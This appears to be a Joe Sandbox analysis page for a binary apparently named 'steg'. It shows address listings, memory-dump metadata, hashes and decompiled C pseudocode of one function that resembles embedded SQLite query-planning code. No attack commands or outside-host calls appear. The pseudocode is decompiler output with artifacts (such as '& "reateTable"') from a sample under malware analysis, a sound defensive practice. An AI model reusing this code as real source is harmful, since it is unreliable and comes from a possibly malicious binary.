                                                                                                                    0x00fc7b9a
                                                                                                                    0x00fc7b9d
                                                                                                                    0x00fc7ba0
                                                                                                                    0x00fc7ba2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc7ba8
                                                                                                                    0x00fc7bab
                                                                                                                    0x00fc7bad
                                                                                                                    0x00fc7baf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc7bb1
                                                                                                                    0x00fc7bb7
                                                                                                                    0x00fc7bb7
                                                                                                                    0x00fc7bbd
                                                                                                                    0x00fc7bc0
                                                                                                                    0x00fc7bc1
                                                                                                                    0x00fc7bc1
                                                                                                                    0x00fc7bc5
                                                                                                                    0x00000000
                                                                                                                    0x00fc7bc5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc7aaa
                                                                                                                    0x00fc7aaa
                                                                                                                    0x00fc7aaa
                                                                                                                    0x00fc7aac
                                                                                                                    0x00fc7aaf
                                                                                                                    0x00fc7b02
                                                                                                                    0x00fc7b02
                                                                                                                    0x00fc7b0a
                                                                                                                    0x00fc7b0f
                                                                                                                    0x00fc7b12
                                                                                                                    0x00fc7b15
                                                                                                                    0x00fc7b17
                                                                                                                    0x00fc7be9
                                                                                                                    0x00fc7bec
                                                                                                                    0x00fc7bef
                                                                                                                    0x00fc7bfa
                                                                                                                    0x00fc7bff
                                                                                                                    0x00fc7c02
                                                                                                                    0x00000000
                                                                                                                    0x00fc7c02
                                                                                                                    0x00fc7b1d
                                                                                                                    0x00fc7b20
                                                                                                                    0x00000000
                                                                                                                    0x00fc7b20
                                                                                                                    0x00fc7ab4
                                                                                                                    0x00fc7ab9
                                                                                                                    0x00fc7abc
                                                                                                                    0x00fc7ac7
                                                                                                                    0x00fc7acb
                                                                                                                    0x00fc7ad0
                                                                                                                    0x00fc7ad3
                                                                                                                    0x00fc7ad6
                                                                                                                    0x00fc7ad8
                                                                                                                    0x00fc7adb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc7add
                                                                                                                    0x00fc7ade
                                                                                                                    0x00fc7ae1
                                                                                                                    0x00fc7ae4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc7ae6
                                                                                                                    0x00fc7afd
                                                                                                                    0x00fc7afd
                                                                                                                    0x00fc7b00
                                                                                                                    0x00fc7b25
                                                                                                                    0x00000000
                                                                                                                    0x00fc7b25
                                                                                                                    0x00000000
                                                                                                                    0x00fc7b00
                                                                                                                    0x00fc7aeb
                                                                                                                    0x00fc7aee
                                                                                                                    0x00fc7af4
                                                                                                                    0x00fc7af7
                                                                                                                    0x00fc7afa
                                                                                                                    0x00000000
                                                                                                                    0x00fc7b28
                                                                                                                    0x00fc7b28
                                                                                                                    0x00fc7b29
                                                                                                                    0x00fc7b2c
                                                                                                                    0x00fc7b2c
                                                                                                                    0x00fc7b35
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc7a8c
                                                                                                                    0x00fc7a8c
                                                                                                                    0x00fc7a8e
                                                                                                                    0x00fc7a8f
                                                                                                                    0x00fc7a97
                                                                                                                    0x00fc7a97
                                                                                                                    0x00000000
                                                                                                                    0x00fc7a8c
                                                                                                                    0x00fc7a71
                                                                                                                    0x00fc7a79
                                                                                                                    0x00fc7a7e
                                                                                                                    0x00000000
                                                                                                                    0x00fc7a7e
                                                                                                                    0x00fc7a2b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc7a34
                                                                                                                    0x00fc7a38
                                                                                                                    0x00fc7a54
                                                                                                                    0x00fc7a56
                                                                                                                    0x00fc7a5f
                                                                                                                    0x00fc7a5f
                                                                                                                    0x00000000
                                                                                                                    0x00fc7a56
                                                                                                                    0x00fc7a3a
                                                                                                                    0x00fc7a3b
                                                                                                                    0x00fc7a3c
                                                                                                                    0x00fc7a47
                                                                                                                    0x00fc7a4c
                                                                                                                    0x00000000
                                                                                                                    0x00fc7a4c
                                                                                                                    0x00fc79f2
                                                                                                                    0x00fc79f7
                                                                                                                    0x00fc7a1b
                                                                                                                    0x00000000
                                                                                                                    0x00fc79f9
                                                                                                                    0x00fc79ff
                                                                                                                    0x00fc7a02
                                                                                                                    0x00fc7a02
                                                                                                                    0x00fc7a07
                                                                                                                    0x00fc7a09
                                                                                                                    0x00fc7a0b
                                                                                                                    0x00fc7a11
                                                                                                                    0x00fc7a13
                                                                                                                    0x00fc7a14
                                                                                                                    0x00000000
                                                                                                                    0x00fc7a16
                                                                                                                    0x00fc7a16
                                                                                                                    0x00000000
                                                                                                                    0x00fc7a16
                                                                                                                    0x00fc7a14
                                                                                                                    0x00fc79b8
                                                                                                                    0x00fc79b8
                                                                                                                    0x00fc79b8
                                                                                                                    0x00fc79ba
                                                                                                                    0x00fc79ba
                                                                                                                    0x00fc79c7
                                                                                                                    0x00fc79cc
                                                                                                                    0x00fc79cf
                                                                                                                    0x00fc79d1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc79da
                                                                                                                    0x00fc79dd
                                                                                                                    0x00fc79de
                                                                                                                    0x00fc79e1
                                                                                                                    0x00fc79e4
                                                                                                                    0x00fc79e7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc79e7
                                                                                                                    0x00000000
                                                                                                                    0x00fc79ba
                                                                                                                    0x00fc79b6
                                                                                                                    0x00fc77b7
                                                                                                                    0x00fc77c3
                                                                                                                    0x00fc77c6
                                                                                                                    0x00fc77ce
                                                                                                                    0x00fc77cf
                                                                                                                    0x00fc77d9
                                                                                                                    0x00fc77e3
                                                                                                                    0x00fc77ec
                                                                                                                    0x00fc77f3
                                                                                                                    0x00fc77fa
                                                                                                                    0x00fc77fd
                                                                                                                    0x00fc780e
                                                                                                                    0x00fc781c
                                                                                                                    0x00fc7821
                                                                                                                    0x00fc7826
                                                                                                                    0x00000000
                                                                                                                    0x00fc783e
                                                                                                                    0x00fc7846
                                                                                                                    0x00fc784b
                                                                                                                    0x00fc7852
                                                                                                                    0x00fc785e
                                                                                                                    0x00fc7863
                                                                                                                    0x00fc7866
                                                                                                                    0x00fc7869
                                                                                                                    0x00fc786e
                                                                                                                    0x00fc7876
                                                                                                                    0x00fc7876
                                                                                                                    0x00fc7881
                                                                                                                    0x00fc788b
                                                                                                                    0x00fc788e
                                                                                                                    0x00fc78aa
                                                                                                                    0x00fc78aa
                                                                                                                    0x00fc78b1
                                                                                                                    0x00fc78b8
                                                                                                                    0x00fc78bb
                                                                                                                    0x00fc78c4
                                                                                                                    0x00fc78cf
                                                                                                                    0x00fc78d6
                                                                                                                    0x00fc78df
                                                                                                                    0x00fc78f4
                                                                                                                    0x00fc7900
                                                                                                                    0x00fc7911
                                                                                                                    0x00fc7922
                                                                                                                    0x00fc792d
                                                                                                                    0x00fc7932
                                                                                                                    0x00fc7935
                                                                                                                    0x00fc7938
                                                                                                                    0x00fc793d
                                                                                                                    0x00fc7945
                                                                                                                    0x00fc7945
                                                                                                                    0x00fc794d
                                                                                                                    0x00fc7956
                                                                                                                    0x00fc795b
                                                                                                                    0x00000000
                                                                                                                    0x00fc795b
                                                                                                                    0x00fc789a
                                                                                                                    0x00fc789f
                                                                                                                    0x00fc78a4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc78a4
                                                                                                                    0x00fc7826
                                                                                                                    0x00fc778b
                                                                                                                    0x00fc7790
                                                                                                                    0x00fc7795
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc7795
                                                                                                                    0x00fc7735

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P|G$P|G$`?C$sH
                                                                                                                    • API String ID: 0-1490539044
                                                                                                                    • Opcode ID: a268be00dcacca3b619f28bc8fd752e6d5f5b5c40fa2a8a00ad644e435027a79
                                                                                                                    • Instruction ID: b514ece353982046ef2067bd99c95427f82bdf295ba9dac05859205942e5848b
                                                                                                                    • Opcode Fuzzy Hash: a268be00dcacca3b619f28bc8fd752e6d5f5b5c40fa2a8a00ad644e435027a79
                                                                                                                    • Instruction Fuzzy Hash: FDD29D70D00206AFDB24EF94CD82FAEBBB5FF04350F18805DE905AB252DB75A951EB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FDFD97 Relevance: 6.0, APIs: 2, Strings: 1, Instructions: 748COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00FDFD97(void* __fp0, signed int _a4, signed short* _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				signed int _v12;
				signed int* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v132;
				signed int _v140;
				char _v172;
				void* __edi;
				void* __esi;
				signed short _t347;
				intOrPtr _t352;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				void* _t368;
				signed int _t371;
				signed int _t381;
				signed short* _t382;
				signed int _t392;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				intOrPtr _t399;
				intOrPtr* _t400;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				void* _t410;
				signed int _t411;
				signed int _t416;
				signed int _t420;
				signed int _t422;
				signed int _t426;
				void* _t427;
				intOrPtr _t428;
				signed int _t434;
				signed int _t439;
				signed int _t444;
				void* _t446;
				signed int* _t447;
				signed int _t450;
				signed short* _t454;
				signed int _t458;
				signed int* _t459;
				signed int* _t461;
				signed int _t462;
				signed int _t463;
				signed int _t465;
				signed int* _t466;
				signed int _t469;
				signed int _t471;
				signed int _t473;
				signed int _t478;
				signed int _t479;
				intOrPtr _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t486;
				void* _t487;
				signed int _t489;
				signed int* _t492;
				signed int _t493;
				void* _t496;
				signed int _t497;
				signed int _t500;
				signed int _t502;
				signed int _t503;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t511;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t517;
				signed int _t518;
				signed int _t520;
				signed int _t522;
				signed int _t526;
				signed int* _t528;
				intOrPtr* _t531;
				void* _t532;
				signed int _t533;
				void* _t537;
				signed int _t538;
				signed int _t539;
				signed int* _t540;
				signed int _t545;
				signed int _t547;
				signed int _t548;
				void* _t549;
				signed int _t551;
				signed int _t552;
				intOrPtr _t554;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				void* _t562;
				intOrPtr _t564;
				void* _t565;
				void* _t566;
				void* _t568;
				void* _t569;
				void* _t573;

				_t573 = __fp0;
				_t466 = _a4;
				_t454 = _a8;
				_v12 = _t466[3];
				_t347 =  *_t454 & 0x0000ffff;
				if(_t347 <= 0x40) {
					_t467 =  *_t466;
					_t545 = (_t347 << 0x00000006) + 0x00000027 & 0xfffffff8;
					_v20 =  *_t466;
					_t6 = _t545 + 0x264; // 0x23d
					_t525 = _t6;
					_t500 = E00FBE727( *_t466, _t6);
					_t566 = _t565 + 8;
					_v8 = _t500;
					__eflags = _t500;
					if(_t500 != 0) {
						E00FE7C87(_t500, 0, _t525);
						_t500 = _v8;
						_t566 = _t566 + 0xc;
					}
					_t526 = _v20;
					__eflags =  *((char*)(_t526 + 0x1e));
					if( *((char*)(_t526 + 0x1e)) != 0) {
						L66:
						E00FE4747(_t467, _t545, _t526, _v8);
						__eflags = 0;
						return 0;
					} else {
						 *((intOrPtr*)(_t500 + 0x18)) =  *_t454;
						 *_t500 = _a4;
						 *(_t500 + 8) = _t454;
						_t352 = E00FDD1A7(_v12);
						_t469 = _v8;
						_t528 = _t469 + _t545;
						 *((intOrPtr*)(_t469 + 0x14)) = _t352;
						_t19 =  &(_t528[0x58]); // 0x160
						_t547 = _t19;
						_v40 = _t528;
						 *(_t469 + 0x1c) = _t528;
						 *((short*)(_t469 + 4)) = _a20;
						_v32 = _t547;
						E00FE7C87(_t547, 0, 0x104);
						_t467 = _a4;
						_t528[1] = _t547;
						_t548 = _a12;
						_t27 =  &(_t528[8]); // 0x20
						_t528[7] = _t27;
						 *_t528 = _t467;
						_t528[5] = 0;
						_t528[6] = 8;
						_t528[2] = 0;
						_t528[3] = 0;
						_v84 = 0x41ae40;
						_v80 = 0;
						_v76 = _t467;
						E00FDFB97( &_v84, _t548);
						E00FE4827(_t528, _t548, 0x43);
						_t566 = _t566 + 0x24;
						__eflags = _t548;
						if(_t548 != 0) {
							__eflags =  *_t454;
							if( *_t454 == 0) {
								L8:
								_t467 = _a4;
								E00FC28B7(_a4, _t548,  *((intOrPtr*)(_v8 + 0x14)), 8);
								_t566 = _t566 + 0x10;
							} else {
								_t450 = E00FC2E27(_t548);
								_t566 = _t566 + 4;
								__eflags = _t450;
								if(_t450 != 0) {
									goto L8;
								}
							}
						}
						_t549 = 0;
						__eflags = 0 -  *_t454;
						if(0 <  *_t454) {
							_t500 = _v32;
							_t540 =  &(_t454[0xa]);
							do {
								_t467 =  *_t500;
								 *(_t500 + 4 +  *_t500 * 4) = _t540[3];
								 *_t500 =  *_t500 + 1;
								_t444 =  *_t540;
								__eflags = _t444;
								if(_t444 != 0) {
									__eflags =  *(_t444 + 0x22) & 0x00000010;
									if(( *(_t444 + 0x22) & 0x00000010) != 0) {
										_t446 = _t549;
										asm("bts ecx, eax");
										__eflags = _t446 - 0x20;
										_t522 =  >=  ? 0 : 0;
										_t467 = 0 ^ _t522;
										__eflags = _t446 - 0x40;
										_t447 = _v40;
										_t523 =  >=  ? _t467 : _t522;
										 *(_t447 + 8) =  *(_t447 + 8) | _t467;
										_t52 = _t447 + 0xc;
										 *_t52 =  *(_t447 + 0xc) | ( >=  ? _t467 : _t522);
										__eflags =  *_t52;
										_t500 = _v32;
									}
								}
								_t549 = _t549 + 1;
								_t540 =  &(_t540[0xe]);
								__eflags = _t549 -  *_t454;
							} while (_t549 <  *_t454);
							_t528 = _v40;
						}
						_t545 = _t528[5] - 1;
						__eflags = _t545;
						while(_t545 >= 0) {
							E00FA5847(_t500, _t454, _t528, _t545);
							_t566 = _t566 + 0xc;
							_t545 = _t545 - 1;
							__eflags = _t545;
						}
						_t526 = _v20;
						__eflags =  *((char*)(_t526 + 0x1e));
						if( *((char*)(_t526 + 0x1e)) != 0) {
							goto L66;
						} else {
							_t467 =  *_t454;
							_t545 = 0;
							_t502 = _v8 + 0x20;
							_v68 = 0xffffffff;
							_v36 = 0xffffffff;
							_v28 = 0xffffffff;
							_v24 = 0;
							_v52 = 0;
							_v16 = _t502;
							_v56 = _t502;
							__eflags = _t467;
							if(_t467 <= 0) {
								L68:
								_t360 = _a4;
								__eflags =  *(_t360 + 0x40);
								if( *(_t360 + 0x40) != 0) {
									goto L66;
								} else {
									__eflags =  *((char*)(_t526 + 0x1e));
									if( *((char*)(_t526 + 0x1e)) != 0) {
										goto L66;
									} else {
										_t471 = _v28 & 0x04000000;
										__eflags = _t471;
										_v28 = _t471;
										if(_t471 != 0) {
											_t486 = _a16;
											__eflags = _t486;
											if(_t486 != 0) {
												 *_t486 = 0;
											}
											_t471 = _v28;
										}
										__eflags = _a20 & 0x00000004;
										if((_a20 & 0x00000004) != 0) {
											__eflags = _t471;
											if(_t471 != 0) {
												 *((char*)(_v8 + 6)) = 1;
												 *_t502 =  *_t502 & 0xff7fffff;
												__eflags =  *_t502;
											}
										}
										_t551 =  *(_t360 + 0xc);
										__eflags = _t551;
										if(_t551 != 0) {
											L80:
											__eflags =  *(_t360 + 0x158);
											if( *(_t360 + 0x158) == 0) {
												_t410 = E00FD6567(_t551, 0x60, 0, 0);
												_t484 = _a4;
												_t566 = _t566 + 0x10;
												_t411 = _t410 + 1;
												__eflags = _t411;
												 *(_t484 + 0x158) = _t411;
												_t360 = _t484;
											}
										} else {
											_t551 = E00FD6AF7( *_t360);
											_t360 = _a4;
											_t566 = _t566 + 4;
											 *(_t360 + 0xc) = _t551;
											__eflags = _t551;
											if(_t551 != 0) {
												E00FD6487(_t551, 0x15);
												_t360 = _a4;
												_t566 = _t566 + 8;
												goto L80;
											}
										}
										_v24 = 0;
										__eflags = 0 -  *_t454;
										if(0 <  *_t454) {
											do {
												__eflags =  *((char*)(_t360 + 0x1bc)) - 2;
												if( *((char*)(_t360 + 0x1bc)) == 2) {
													_t556 = (_v16[0xa] & 0x000000ff) * 8 - (_v16[0xa] & 0x000000ff);
													_t533 = E00FC9197(_t526, 0x478ca0,  *((intOrPtr*)(_t454 + 0xc + _t556 * 8)));
													_t396 =  *(_t454 + 0x10 + _t556 * 8);
													_t557 = _v20;
													_t568 = _t566 + 0xc;
													__eflags = _t396;
													if(__eflags != 0) {
														_push(_t396);
														_t409 = E00FC9137(__eflags, _t557, _t533, 0x478cac, _t533);
														_t568 = _t568 + 0x14;
														_t533 = _t409;
													}
													_t461 = _v16;
													_t397 =  *_t461;
													__eflags = _t397 & 0x000f0000;
													if(__eflags == 0) {
														__eflags = _t397 & 0x10000000;
														if(__eflags == 0) {
															__eflags = _t397 & 0x00003000;
															if(__eflags == 0) {
																__eflags = _t397 & 0x08000000;
																if(__eflags != 0) {
																	_t406 = _t461[2];
																	_push( *((intOrPtr*)(_t406 + 0x18)));
																	_push( *((intOrPtr*)(_t406 + 0x14)));
																	_t407 = E00FC9137(__eflags, _t557, _t533, 0x478d00, _t533);
																	_t568 = _t568 + 0x18;
																	goto L95;
																}
															} else {
																_t407 = E00FC9137(__eflags, _t557, _t533, 0x478ce8, _t533);
																_t568 = _t568 + 0x10;
																goto L95;
															}
														} else {
															_t407 = E00FC9137(__eflags, _t557, _t533, 0x478ccc, _t533);
															_t568 = _t568 + 0x10;
															goto L95;
														}
													} else {
														_push( *(_t461[2]));
														_t407 = E00FC9137(__eflags, _t557, _t533, 0x478cb8, _t533);
														_t568 = _t568 + 0x14;
														L95:
														_t533 = _t407;
													}
													__eflags =  *_t461 & "reateTable";
													if(__eflags != 0) {
														_t405 = E00FC9137(__eflags, _t557, _t533, 0x478d20, _t533);
														_t568 = _t568 + 0x10;
														_t533 = _t405;
													}
													_t398 = _v12;
													_t462 = _t461[0xa] & 0x000000ff;
													_t558 =  *(_t398 + 0xc);
													__eflags =  *((intOrPtr*)(_t398 + 0x10)) - _t558;
													if( *((intOrPtr*)(_t398 + 0x10)) > _t558) {
														L101:
														_t209 = _t398 + 0xc;
														 *_t209 =  *(_t398 + 0xc) + 1;
														__eflags =  *_t209;
														_t399 =  *((intOrPtr*)(_t398 + 0x14));
														_t479 = _t558 + _t558 * 4;
														 *((short*)(_t399 + _t479 * 4)) = 0x73;
														 *((char*)(_t399 + 3 + _t479 * 4)) = 0;
														 *((intOrPtr*)(_t399 + 4 + _t479 * 4)) = _v24;
														 *(_t399 + 8 + _t479 * 4) = _t462;
														 *(_t399 + 0xc + _t479 * 4) = 0;
														 *(_t399 + 0x10 + _t479 * 4) = 0;
														_t400 = _v12;
														 *((char*)(_t400 + 0x6e)) = 0;
													} else {
														_t404 = E00FA96F7(_t398);
														_t568 = _t568 + 4;
														__eflags = _t404;
														_t398 = _v12;
														if(_t404 == 0) {
															goto L101;
														} else {
															_t558 = 1;
														}
													}
													_t463 =  *(_t400 + 0x14);
													_t480 =  *_t400;
													__eflags = _t463;
													if(_t463 == 0) {
														L109:
														E00FA7BC7(_t480, 0xffffffff, _t533);
														_t566 = _t568 + 0xc;
													} else {
														__eflags =  *((char*)(_t480 + 0x1e));
														if( *((char*)(_t480 + 0x1e)) != 0) {
															goto L109;
														} else {
															__eflags = _t558;
															if(_t558 < 0) {
																_t558 =  *((intOrPtr*)(_t400 + 0xc)) - 1;
																__eflags = _t558;
															}
															_t559 = _t558 + _t558 * 4;
															E00FA7BC7(_t480,  *((char*)(_t463 + 1 + _t559 * 4)),  *(_t463 + 0x10 + _t559 * 4));
															_t566 = _t568 + 0xc;
															 *(_t463 + 0x10 + _t559 * 4) = 0;
															__eflags = _t533;
															if(_t533 != 0) {
																 *(_t463 + 0x10 + _t559 * 4) = _t533;
																 *((char*)(_t463 + 1 + _t559 * 4)) = 0xff;
															} else {
																 *(_t463 + 0x10 + _t559 * 4) = _t533;
																 *((char*)(_t463 + 1 + _t559 * 4)) = 0;
															}
														}
													}
												}
												_t476 = _a8;
												_t532 = 0xfff0bdc0;
												_t458 = (_v16[0xa] & 0x000000ff) * 8 - (_v16[0xa] & 0x000000ff);
												_t554 =  *((intOrPtr*)(_a8 + 0x14 + _t458 * 8));
												_t368 =  *_a4;
												_t502 =  *(_t554 + 0x48);
												__eflags = _t502;
												if(_t502 != 0) {
													_t483 =  *(_t368 + 4);
													_t532 = 0;
													__eflags = _t483;
													if(_t483 > 0) {
														_t392 =  *((intOrPtr*)(_t368 + 8)) + 0xc;
														__eflags = _t392;
														while(1) {
															__eflags =  *_t392 - _t502;
															if( *_t392 == _t502) {
																goto L115;
															}
															_t532 = _t532 + 1;
															_t392 = _t392 + 0x10;
															__eflags = _t532 - _t483;
															if(_t532 < _t483) {
																continue;
															}
															goto L115;
														}
													}
													L115:
													_t476 = _a8;
												}
												__eflags =  *(_t554 + 0x22) & 0x00000002;
												if(( *(_t554 + 0x22) & 0x00000002) != 0) {
													L131:
													_t459 = _v16;
												} else {
													__eflags =  *(_t554 + 0x1c);
													if( *(_t554 + 0x1c) != 0) {
														goto L131;
													} else {
														_t371 =  *_v16;
														__eflags = _t371 & 0x08000000;
														if((_t371 & 0x08000000) == 0) {
															__eflags = _t371 & 0x00800000;
															if((_t371 & 0x00800000) != 0) {
																L127:
																E00FD2377(_a4, _t532,  *((intOrPtr*)(_t554 + 0x18)), 0,  *((intOrPtr*)(_t554 + 4)));
																_t569 = _t566 + 0x14;
															} else {
																__eflags = _a20 & 0x00000010;
																if((_a20 & 0x00000010) != 0) {
																	goto L127;
																} else {
																	__eflags =  *((char*)(_v8 + 6));
																	_t502 = 0xa;
																	_t379 =  !=  ? 0xa : 0xd;
																	E00FC9D67(_a4,  *((intOrPtr*)(_t476 + 0x20 + _t458 * 8)), _t532, _t554,  !=  ? 0xa : 0xd);
																	_t381 = _v8;
																	_t569 = _t566 + 0x14;
																	__eflags =  *((char*)(_t381 + 6));
																	if( *((char*)(_t381 + 6)) == 0) {
																		__eflags =  *((intOrPtr*)(_t554 + 0xc)) - 0x40;
																		if( *((intOrPtr*)(_t554 + 0xc)) < 0x40) {
																			_t382 = _a8;
																			_t562 = 0;
																			_t502 =  *(_t382 + 0x30 + _t458 * 8);
																			_t481 =  *(_t382 + 0x34 + _t458 * 8);
																			__eflags = _t502 | _t481;
																			while((_t502 | _t481) != 0) {
																				_t502 = (_t481 << 0x00000020 | _t502) >> 1;
																				_t481 = _t481 >> 1;
																				_t562 = _t562 + 1;
																				__eflags = _t502 | _t481;
																			}
																			E00FD67D7(_t532, _t562, _v12,  *(_v12 + 0xc) - 1, _t562, 0xfffffff2);
																			_t569 = _t569 + 0x10;
																		}
																	}
																}
															}
														} else {
															E00FD6647(_v12, 0x20,  *((intOrPtr*)(_t476 + 0x20 + _t458 * 8)), 0, 0,  *((intOrPtr*)(_t554 + 0x38)), 0xfffffff6);
															_t569 = _t566 + 0x1c;
														}
														_t459 = _v16;
														__eflags =  *_t459 & 0x000f0000;
														_t459[4] =  *(_a8 + 0x20 + _t458 * 8);
														if(( *_t459 & 0x000f0000) != 0) {
															E00FD6647(_v12, 0xd, _t459[5],  *((intOrPtr*)(_t459[2] + 0x14)), _t532, E00FC6E47(_a4, _t459[2]), 0xfffffff0);
															_t569 = _t569 + 0x24;
														}
														E00FBD1E7(_a4, _t532);
														_t566 = _t569 + 8;
													}
												}
												_t526 = _v20;
												_v16 =  &(_t459[0x10]);
												_t454 = _a8;
												_t478 = _v24 + 1;
												__eflags = _t478 -  *_t454;
												_t360 = _a4;
												_v24 = _t478;
											} while (_t478 <  *_t454);
										}
										_t473 = _v8;
										_t362 =  *(_v12 + 0xc);
										 *(_t473 + 0xc) = _t362;
										_t363 = _t362 | 0xffffffff;
										_t503 = _t502 | 0xffffffff;
										_t552 = 0;
										__eflags = 0 -  *_t454;
										if(0 <  *_t454) {
											_t531 = _t473 + 0x40;
											do {
												_t363 = E00FA2707(_t473, _t552, _a20, _t363, _t503);
												_t552 = _t552 + 1;
												 *((intOrPtr*)(_v8 + 0x10)) =  *_t531;
												_t566 = _t566 + 0x14;
												__eflags = _t552 -  *_a8;
												_t473 = _v8;
												_t531 = _t531 + 0x40;
											} while (_t552 <  *_a8);
										}
										return _t473;
									}
								}
							} else {
								while(1) {
									asm("movsd xmm0, [0x479028]");
									asm("xorps xmm2, xmm2");
									_t506 = 0;
									_v60 = 0;
									_v48 = 0;
									asm("movq [ebp-0x68], xmm2");
									asm("movq [ebp-0x88], xmm2");
									asm("movq [ebp-0x80], xmm2");
									asm("movq [ebp-0x78], xmm2");
									asm("movq [ebp-0x70], xmm2");
									asm("movsd [ebp-0x60], xmm0");
									_v44 = _t545;
									_t537 = _t454 + (_t545 * 8 - _t545 + 1) * 8;
									__eflags = _t545 - _t467;
									if(_t545 >= _t467) {
										goto L50;
									}
									_t426 = (_t545 << 6) + _v8 + 0x5c;
									__eflags = _t426;
									_v64 = _t426;
									do {
										__eflags =  *(_t537 + 0x15) & 0x0000000a;
										_t465 = 0 | ( *(_t537 + 0x15) & 0x0000000a) != 0x00000000;
										__eflags = _t506;
										if(_t506 == 0) {
											L26:
											_t492 = _v32;
											_t427 = 0;
											_t514 =  *_t492;
											__eflags = _t514;
											if(_t514 <= 0) {
												L30:
												asm("xorps xmm0, xmm0");
												asm("movlpd [ebp-0x58], xmm0");
												_t515 = _v88;
												_t493 = _v92;
											} else {
												_t564 =  *((intOrPtr*)(_t537 + 0x18));
												_t497 =  &(_t492[1]);
												__eflags = _t497;
												while(1) {
													__eflags =  *_t497 - _t564;
													if( *_t497 == _t564) {
														break;
													}
													_t427 = _t427 + 1;
													_t497 = _t497 + 4;
													__eflags = _t427 - _t514;
													if(_t427 < _t514) {
														continue;
													} else {
														goto L30;
													}
													goto L31;
												}
												asm("bts ecx, eax");
												__eflags = _t427 - 0x20;
												_t520 =  >=  ? 0 : 0;
												_t493 = 0 ^ _t520;
												__eflags = _t427 - 0x40;
												_t515 =  >=  ? _t493 : _t520;
											}
											L31:
											_t545 = _v68;
											__eflags = _t493 & _t545 | _t515 & _v36;
											if((_t493 & _t545 | _t515 & _v36) != 0) {
												__eflags = _v52;
												if(_v52 != 0) {
													L38:
													_t496 = 0;
													__eflags = 0;
												} else {
													_t434 = _a16;
													__eflags = _t434;
													if(_t434 == 0) {
														goto L38;
													} else {
														_t496 =  *_t434;
													}
												}
												_t428 =  *((intOrPtr*)(_t537 + 0xc));
												__eflags =  *(_t428 + 0x22) & 0x00000010;
												if(( *(_t428 + 0x22) & 0x00000010) == 0) {
													E00F9F4F7(_t573, _a4, _v40, _t537, _t545, _v36, _t496,  &_v172);
													_t566 = _t566 + 0x1c;
												} else {
													E00F9FFA7(_t496, _t573, _a4, _v40, _t537, _t545, _v36, _t496,  &_v172, _v64);
													_t566 = _t566 + 0x20;
												}
												asm("movsd xmm1, [ebp-0x98]");
												__eflags = _v48;
												if(__eflags == 0) {
													L44:
													asm("movq xmm0, [ebp-0xa0]");
													asm("movq xmm2, [ebp-0xa8]");
													_t517 = _v44;
													asm("movq [ebp-0x80], xmm0");
													asm("movq xmm0, [ebp-0x90]");
													_v48 = 1;
													asm("movq [ebp-0x68], xmm2");
													asm("movq [ebp-0x88], xmm2");
													asm("movq [ebp-0x60], xmm1");
													asm("movq [ebp-0x70], xmm0");
													_v60 = _t517;
												} else {
													asm("movsd xmm0, [ebp-0x60]");
													asm("comisd xmm0, xmm1");
													if(__eflags <= 0) {
														asm("movq xmm2, [ebp-0x68]");
														_t517 = _v44;
													} else {
														goto L44;
													}
												}
												__eflags = _t465;
												if(_t465 != 0) {
													goto L49;
												} else {
													goto L47;
												}
											} else {
												_t517 = _v44;
												_t545 = _v24;
												__eflags = _t517 - _t545;
												if(_t517 == _t545) {
													_v24 = _t545;
												}
												goto L47;
											}
										} else {
											__eflags = 0;
											if(0 != 0) {
												L49:
												_t454 = _a8;
											} else {
												goto L26;
											}
										}
										goto L50;
										L47:
										_t454 = _a8;
										_v64 = _v64 + 0x40;
										_t518 = _t517 + 1;
										_t537 = _t537 + 0x38;
										_v44 = _t518;
										__eflags = _t518 -  *_t454;
										_t506 = _v48;
									} while (_t518 <  *_t454);
									L50:
									_t538 = _v140;
									__eflags = _t538 & "reateTable";
									if((_t538 & "reateTable") != 0) {
										 *_a16 = 0;
									}
									_t507 = _v56;
									_v28 = _v28 & _t538;
									asm("movq [edx], xmm2");
									 *((intOrPtr*)(_t507 + 8)) = _v132;
									_t539 = _t538 & 0x000f0000;
									__eflags = _t539;
